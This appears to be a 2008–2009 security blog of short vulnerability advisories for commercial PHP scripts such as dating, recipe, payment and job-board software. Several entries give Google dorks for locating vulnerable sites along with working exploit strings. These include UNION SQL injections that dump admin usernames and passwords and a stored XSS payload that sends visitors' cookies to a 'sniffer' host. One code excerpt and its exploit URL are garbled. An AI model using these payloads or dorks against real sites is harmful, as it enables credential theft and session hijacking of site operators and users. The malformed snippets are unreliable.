Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS

March 22, 2009

Application: Irokez Blog
Website: http://irokez.org
Version: All (0.7.3.2)
Date: 11-02-2009


Jamit Job Board SQL-INJECTION, XSS

January 28, 2009

Back last year an advisory titled Jamit Job Board 3.x (show_emp) Blind SQL Injection Vulnerability was posted on milw0rm. As often happens, the only "final exploit" given was a string for viewing the mysql version, and the author never really worked out the nature of the vulnerability (it is a perfectly ordinary injection, what blind?! 0o). While sorting through the junk on my hard drive I found my own version of the advisory, written back in the summer of last year.


K-Rate SQL-INJECTION, XSS

September 25, 2008

Application: K-Rate

Website: http://turn-k.net/k-rate

Version: All

About: K-Rate picture rating script. Price 115$.

Googledork: Powered by K-Rate

Date: 01-07-2008


Xpoz SQL-INJECTION, XSS

September 25, 2008

Application: Xpoz PRO (Expoze Photo Store)

Website: http://xpoze.org

Version: All (current 1.0)

About: Xpoze is a photo store very easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs.

Googledork: Powered by Powered by Xpoze.org

Date: 01-07-2008


E-topbiz Payment Processor 2 SQL-INJECTION

September 24, 2008

Application: E-topbiz Payment Processor 2

Version: 2.0

Website: http://e-topbiz.com/oprema/pages/pproc2.php

Demo: http://e-topbiz.com/trafficdemos/payment2/

About: The payment processor php script allows you to own and operate your very own paypal type payment processor website and to make a percentage OF EACH AND EVERY TRANSACTION that takes place on your site.

Date: 01-08-2008

[ SQL-INJECTION ]

http://host/shop.htm?cid=-1[SQL]

===>>> Exploit:

http://host/shop.htm?cid=-1 union select 1,2,concat(user(),0x3a,version())


K-Links Directory SQL-INJECTION, XSS

September 24, 2008

Application: K-Links Directory

Website: http://turn-k.net/k-links

Version: Platinum (All)

About: Script for starting a profitable link directory website offering full-featured directory of resources/links similar to Yahoo-style search engine. Price 79-169$.

Googledork: Powered By K-Links Directory

Demo: http://klinksdemo.com

Date: 24-07-2008


PPVCHAT ACTIVE XSS

September 24, 2008

Application: PPVCHAT

Website: http://ppvchat.com

Version: All

About: Pay-per-view adult video chat software. Price 999$.

Googledork: Copyright © 2006 PPVChat.com

Date: 05-07-2008

Description:

Fields are not filtered when new users/models register.

===>>> Exploit:

<script>img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;</script>


Dating 3 PHP Script SQL-INJECTION

September 24, 2008

Application: E-topbiz Dating 3 PHP Script

Website: http://e-topbiz.com/oprema/pages/dating3.php

Demo: http://e-topbiz.com/trafficdemos/dating3

Version: 3.0

About: Dating 3 is a very powerful top quality dating php script for webmasters who wish to run an online dating site.

Date: 01-08-2008

[ VULNERABLE CODE ]

members/mail.php

if($action==inbox) {
$result=mysql_query("select * from mail where UserTo ='$username' ORDER BY SentDate DESC") or die ("cant do it");
if($action==veiw) {
$result=mysql_query("select * from mail where UserTo='$username' and mail_id=$mail_id") or die ("cant do it");

===>>> Exploit:

http://host/members/mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin/*


Recipe Script SQL-INJECTION

September 24, 2008

Application: Recipe Script

Version: 6.0

Website: http://fivedollarscripts.com

Demo: http://recipebag.com

Date: 03-08-2008

[ VULNERABLE CODE ]

viewrecipe.php

$sql="select * from recipe where recipeid=$recid";
$res=mysql_query($sql);

$result=mysql_query("select * from recipescomments where approved='Y' and recipeid=$recid");
if(mysql_num_rows($result))do it");

===>>> Exploit:

http://host/blabla-0 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,1,2,3,4,5,6,7,8,9 from recipesadmin.php

// Admin Login – http://host/admin2